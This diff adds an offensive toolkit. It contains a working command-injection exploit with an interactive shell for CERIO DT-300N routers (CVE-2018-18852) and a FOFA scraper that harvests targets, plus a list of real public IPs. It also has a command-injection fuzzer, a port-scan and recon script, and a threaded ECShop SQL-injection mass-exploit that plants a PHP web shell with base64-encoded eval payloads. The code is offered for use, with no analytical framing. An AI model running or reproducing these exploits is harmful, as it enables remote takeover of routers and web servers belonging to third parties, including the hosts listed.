1

CVE-2018-18852/README.md

@@ -0,0 +1,11 @@
+如果你想获取测试IP：直接执行sousuo.py，他会从fofa.so抓取1页的IP
+
+漏洞利用：
+``````
+python3 exp.py
+填入漏洞的IP
+
+端口
+
+账户
+``````

CVE-2018-18852/exp.py

@@ -0,0 +1,82 @@
+#author:九世
+#time:2019/1/30
+
+import requests
+import json
+import base64
+
+class Demo:
+    def __init__(self,headers,url,payload,url2):
+        self.headers=headers
+        self.url=url
+        self.payload=payload
+        self.url2=url2
+
+    def requet(self):
+        ver = 'DT-300N-NGS-M'
+        ver2='DT-300N'
+        version=''
+        vurl=''
+        rqt=requests.post(url=self.url,headers=self.headers,data=self.payload)
+        nurl=''
+        nersion=''
+        if rqt.status_code==requests.codes.ok:
+            print('[+] Router version number is {}'.format(ver))
+            while True:
+                rqt = requests.post(url=self.url, headers=self.headers, data=self.payload)
+                nurl+=rqt.url
+                nersion+=ver
+                nary=json.loads(rqt.content)
+                cmd = input('command：')
+                payload = {'ip': '127.0.0.1;' + 'echo "[[[";' + cmd, 'pid': nary['pid'], 'Times': 1}
+                self.command(self.url, headers, payload,nersion)
+
+        elif rqt.status_code==requests.codes.not_found: #判断状态码是否为404
+            print('[-] Router version number is not {}'.format(ver))
+            rqts=requests.post(url=self.url2,headers=headers,data=self.payload)
+            if rqts.status_code==requests.codes.ok:
+                print('[+] Router version number is {}'.format(ver2))
+                while True:
+                    rqts = requests.post(url=self.url2, headers=headers, data=self.payload)
+                    version+=ver2
+                    vurl+=rqts.url
+                    vary=json.loads(rqts.content)
+                    cmd=input('command：')
+                    payload = {'ip': '127.0.0.1;' + 'echo "[[[";' + cmd, 'pid': vary, 'Times': 1}
+                    self.command(self.url2,headers,payload,version)
+            elif rqts.status_code==requests.codes.not_found:
+                print('[-] Router version number is not {}'.format(ver2))
+                exit()
+            elif rqts.status_code==requests.codes.unauthorized:
+                print('[-] Auth is invalid, try other creds')
+                exit()
+
+    def command(self,url,header,data,ver):
+        rsv=requests.post(url=url,headers=header,data=data)
+        if ver=='DT-300N':
+            print(rsv.text.split('/html')[1])
+        else:
+            print(rsv.text.split('[[[')[1])
+if __name__ == '__main__':
+    print('[&] The version of CERIO that is vulnerable is as follows')
+    print('[!] CERIO DT-300N-NGS-M\n[!] CERIO DT-300N')
+    print('')
+    t=''
+    path='/cgi-bin/main.cgi?cgi=PING&mode=9'
+    path2='/cgi-bin/Save.cgi?cgi=PING'
+    user=input('host:').strip()
+    ports=input('port:').strip()
+    username=input('creds:').strip()
+    creds=bytes(base64.b64encode(bytes(username,encoding='utf-8'))).decode('utf-8')
+    if ports in '443':
+        t+='https://'
+    else:
+        t+='http://'
+
+
+    urls=t+user+':'+ports+path
+    urls2=t+user+':'+ports+path2
+    payload={'cgi':'PING','mode':9}
+    headers={'content-type': 'application/json', 'Host': user, 'Accept-Encoding': 'gzip, deflate','Content-Length': '0', 'Connection': 'keep-alive', 'Authorization': 'Basic {}'.format(creds)}
+    obj=Demo(headers=headers,payload=payload,url=urls,url2=urls2)
+    obj.requet()

CVE-2018-18852/save.txt

@@ -0,0 +1,10 @@
+1.173.33.86
+36.233.167.168
+61.227.186.39
+36.234.145.128
+1.175.130.77
+61.223.178.171
+1.175.58.177
+36.224.215.199
+118.165.7.180
+219.86.30.66

CVE-2018-18852/sousuo.py

@@ -0,0 +1,35 @@
+#author:九世
+#time:2019/1/29
+
+import requests
+import os
+import re
+from bs4 import *
+
+
+xj=open('save.txt','w')
+xj.close()
+
+class Fofa:
+    def __init__(self,headers,url):
+        self.headers=headers
+        self.url=url
+
+    def requet(self):
+        try:
+            rqt=requests.get(url=self.url,headers=self.headers)
+            zz=re.findall('<a target="_blank" href=".*">.* <i class="fa fa-link"></i></a>',rqt.text)
+            for z in zz:
+                href=BeautifulSoup(str(z),'html.parser')
+                for q in href.find_all('a'):
+                    host=q.get('href')
+                    print('[+]IP:'+str(host).replace('http://','').replace('https://','').lstrip())
+                    print(str(host).replace('http://', '').replace('https://', '').lstrip(),file=open('save.txt','a'))
+        except Exception as r:
+            print('[!] Error {}'.format(r))
+
+if __name__ == '__main__':
+    headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
+    url='https://fofa.so/result?qbase64=YXBwPSJjZXJpb19EVDMwME4i'
+    obj=Fofa(headers=headers,url=url)
+    obj.requet()

Command injection/Commandinjection.py

@@ -0,0 +1,45 @@
+import requests
+import optparse
+import re
+
+
+def main():
+    parser=optparse.OptionParser()
+    parser.add_option('-u',dest='zru',help='Used for fuzzy testing')
+    (options,args)=parser.parse_args()
+    if options.zru:
+        url=options.zru
+        fuzz(url)
+    else:
+        parser.print_help()
+        exit()
+
+def fuzz(url):
+    cookies='PHPSESSID=70mpunbrle3mb6bfaiqieqf3p3;security=high'
+    cookie = {}
+    for k in str(cookies).strip().split(';'):
+        key, value = k.split('=', 1)
+        cookie[key] = value
+
+    urls=url
+    headers={'user-aegnt':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'}
+    payload=['|',';','||','&&','&']
+    payload_b=['-','$']
+    payload_c=['-']
+    payload_d=['$']
+    for p in payload:
+        for pb in payload_b:
+            for pc in payload_c:
+                for pd in payload_d:
+                    pf=pc+pd
+                    datas={'ip':'127.0.0.1{}i{}p{}c{}o{}n{}f{}i{}g'.format(p,pb,pb,pb,pb,pb,pb,pb),'Submit':'Submit'}
+                    datas2={'ip': '127.0.0.1{}i{}p{}c{}o{}n{}f{}i{}g'.format(p, pf, pf, pf, pf, pf, pf, pf),'Submit': 'Submit'}
+                    reqt=requests.post(url=urls,headers=headers,cookies=cookie,data=datas)
+                    reqt2=requests.post(url=urls,headers=headers,cookies=cookie,data=datas2)
+                    if 'Windows IP' in reqt.text:
+                        print('[+] Bypass success URL:{} data:{}'.format(reqt.url,datas))
+                    if 'Windows IP' in reqt2.text:
+                        print('[+] Bypass success URL:{} data:{}'.format(reqt.url, datas))
+
+if __name__ == '__main__':
+    main()

Distinguish.py

@@ -0,0 +1,132 @@
+import requests
+import re
+import socket
+from bs4 import BeautifulSoup
+import optparse
+
+def main():
+	parser=optparse.OptionParser()
+	parser.add_option('-p',dest='host',help='ip port scanner')
+	parser.add_option('-w',dest='whois',help='Whois query')
+	parser.add_option('-d',dest='dns',help='dns query')
+	parser.add_option('-z',dest='domain',help='Domain name query')
+	parser.add_option('-f',dest='fw',help='Bypass query')
+	(options,args)=parser.parse_args()
+	if options.host:
+		ip=options.host
+		portscanner(ip)
+	elif options.whois:
+		ws=options.whois
+		whois(ws)
+	elif options.dns:
+		dn=options.dns
+		dnsquery(dn)
+	elif options.domain:
+		domain=options.domain
+		domains(domain)
+	elif options.fw:
+		pz=options.fw
+		bypass(pz)
+	else:
+		parser.print_help()
+		exit()
+def portscanner(ip):
+	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+	socket.setdefaulttimeout(1)
+	for port in range(1,65535):
+		try:
+			s.connect((ip,port))
+			print('[+]',ip,':',port,'open')
+		except:
+			pass
+
+def whois(ws):
+	url = "http://whoissoft.com/{}".format(ws)
+	rest = requests.get(url=url)
+	csd = rest.content.decode('utf-8')
+	fsd = BeautifulSoup(csd, 'html.parser')
+	wsd = fsd.get_text()
+	comp = re.compile(
+		r'a:link, a:visited {.*? }|a:hover {.*?}|white-space: .*?;|font-family:.*?;|function\s+s|window.location.href\s+=\s+".*?"|return\s+false;| var _sedoq\s+=\s+_sedoq|_sedoq.partnerid\s+=\s+''316085'';| _sedoq.locale\s+=\s+''zh-cn'';|var\s+s\s+=\s+document.createElement|s.type\s+=\s+''text/javascript'';|s.async\s+=\s+true;|s.src\s+=\s+''.*?'';|var\s+f\s+=\s+document.getElementsByTagName|f.parentNode.insertBefore|/.*?/|pre\s+{|word-wrap:\s+break-word;|}|\s*\(str1\){|\s+\+\s+str1;|\s+\|\s+\|\|\s+{;|\s+\|\|\s+{;|_sedoq.partnerid|\s+=|''316085''|\s+'';|\s+enter\s+your\s+partner\s+id|_sedoq.locale\s+=\s+|zh-cn|language\s+locale|\(function\(\)\s+{|\[0\];|s.type|text/javascript|script|s,\s+f|document.getElementById\(.*?\)|.style.marginLeft|=window|\|\||\s+{|;|en-us,|en-uk,|de-de,|es-er-fr,|pt-br,|\s+.innerWidth2|es-|er-|fr|.innerWidth2|er|-,')
+	tih = re.sub(comp, "", wsd)
+	wrs = open('whois.txt', 'w')
+	wrs.write(tih)
+	wrs.close()
+	wrr = open('whois.txt', 'r')
+	rr = wrr.read()
+	xin = rr.replace("''", '')
+	xin2 = xin.replace("(", '')
+	xin3 = xin2.replace(")", '')
+	xin4 = xin3.replace("er-,", '')
+	xin5 = xin4.replace('.innWidth2+"px"', '')
+	xin6 = xin5.replace('window.onresize=function{', '')
+	xin7 = xin6.replace('.innWidth2+"px"', '')
+	print(xin7, end='')
+def dnsquery(dn):
+	url = "https://jiexifenxi.51240.com/web_system/51240_com_www/system/file/jiexifenxi/get/?ajaxtimestamp=1526175925753"
+	headers = {
+		'user-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16'}
+	params = {'q': '{}'.format(dn), 'type': 'a'}
+	reqst = requests.post(url=url, headers=headers, params=params)
+	content = reqst.content.decode('utf-8')
+	bd = BeautifulSoup(content, 'html.parser')
+
+	print('---[+]A record---')
+	print(bd.get_text())
+
+	print('---[+]MX record---')
+	params2 = {'q': '{}'.format(dn), 'type': 'mx'}
+	rest = requests.post(url=url, headers=headers, params=params2)
+	content2 = BeautifulSoup(rest.content.decode('utf-8'), 'html.parser')
+	print(content2.get_text())
+
+	print('---[+]CNAME record---')
+	params3 = {'q': '{}'.format(dn), 'type': 'cname'}
+	rest2 = requests.post(url=url, headers=headers, params=params3)
+	content3 = BeautifulSoup(rest2.content.decode('utf-8'), 'html.parser')
+	print(content3.get_text())
+
+	print('---[+]NS record---')
+	params4 = {'q': '{}'.format(dn), 'type': 'ns'}
+	rest3 = requests.post(url=url, headers=headers, params=params4)
+	content4 = BeautifulSoup(rest3.content.decode('utf-8'), 'html.parser')
+	print(content4.get_text())
+
+	print('---[+]TXT record---')
+	params5 = {'q': '{}'.format(dn), 'type': 'txt'}
+	rest4 = requests.post(url=url, headers=headers, params=params5)
+	content5 = BeautifulSoup(rest4.content.decode('utf-8'), 'html.parser')
+	print(content5.get_text())
+
+def domains(domain):
+	print('---[+]Domain name query---')
+	url = "http://i.links.cn/subdomain/"
+	headers = {'user-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16'}
+	params = {'domain': '{}'.format(domain), 'b2': '1', 'b3': '1', 'b4': '1'}
+	reqst = requests.post(url=url, headers=headers, params=params)
+	vd = reqst.content.decode('gbk')
+	rw = re.findall('<div class=domain><input type=hidden name=.*? id=.*? value=".*?">', vd)
+	rw2 = "".join(str(rw))
+	bwdw = BeautifulSoup(str(rw2), 'html.parser')
+	pw = bwdw.find_all('input')
+	for l in pw:
+		isd = l.get("value")
+		print(isd)
+
+def bypass(pz):
+	url = "http://www.webscan.cc/?action=query&ip={}".format(pz)
+	headers = {
+		'user-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16'}
+	wd = requests.get(url=url, headers=headers)
+	rcy = wd.content.decode('utf-8')
+	res = re.findall('"domain":".*?"', str(rcy))
+	lis = "".join(res)
+	rmm = lis.replace('"', '')
+	rmm2 = rmm.replace(':', '')
+	rmm3 = rmm2.replace('/', '')
+	rmm4 = rmm3.replace('domain', '')
+	rmm5 = rmm4.replace('http', '')
+	print(rmm5)
+
+if __name__ == '__main__':
+    main()

ECShop-exploit/eschop-exp.py

@@ -0,0 +1,59 @@
+import requests
+import threading
+import os
+import re
+import time
+
+xj=open('save.txt','w')
+xj.close()
+
+cz=[]
+def exploit(url):
+    url=url+'/user.php'
+    header={'Referer': '554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca'}
+    data={'action':'login','vulnspy':'phpinfo();exit;'}
+    try:
+        reqt=requests.post(url=url,headers=header,data=data,timeout=10)
+        if 'PHP Version' in reqt.text:
+            print('[+] Remote code execution high-risk vulnerabilities url:{}'.format(reqt.url))
+            print('[+] Remote code execution high-risk vulnerabilities url:{}'.format(reqt.url),file=open('save.txt','a'))
+            cz.append(reqt.url)
+        else:
+            print('[-] Not debug url:{}'.format(reqt.url))
+    except Exception as g:
+        print('[-] Error {}'.format(g))
+
+    if len(cz)>0:
+        print('[+] start getshell')
+    else:
+        print('[-] not debug,Unable to getshell')
+        exit()
+
+
+    getshellpayloads={'action':'login','vulnspy':'eval(base64_decode($_POST[d]));exit;','d':'ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOz8+Jyk7'}
+
+    for t in cz:
+        tx=re.sub('/user.php','',str(t))
+        try:
+            reqts2=requests.post(url=t,headers=header,data=getshellpayloads)
+            reqts3=requests.post(url=tx+'/vulnspy.php?vulnspy=phpinfo();')
+            if 'PHP Version' in reqts3.text:
+                print('[+] Getshell success url:{} password:{}'.format(reqts3.url, 'vulnspy'))
+                print('[+] Getshell success url:{} password:{}'.format(reqts3.url,'vulnspy'),file=open('save.txt','a'))
+            else:
+                print('[-] Getshell failure url:{}'.format(reqts3.url))
+        except Exception as p:
+            print('[-] Error {}'.format(p))
+if __name__ == '__main__':
+    user = input('file:')
+    if os.path.exists(user):
+        print('[+] file {} ok'.format(user))
+    else:
+        print('[-] not file {}'.format(user))
+        exit()
+
+    dk=open('{}'.format(user),'r')
+    for d in dk.readlines():
+        qc="".join(d.split('\n'))
+        t=threading.Thread(target=exploit,args=(qc.rstrip('/'),))
+        t.start()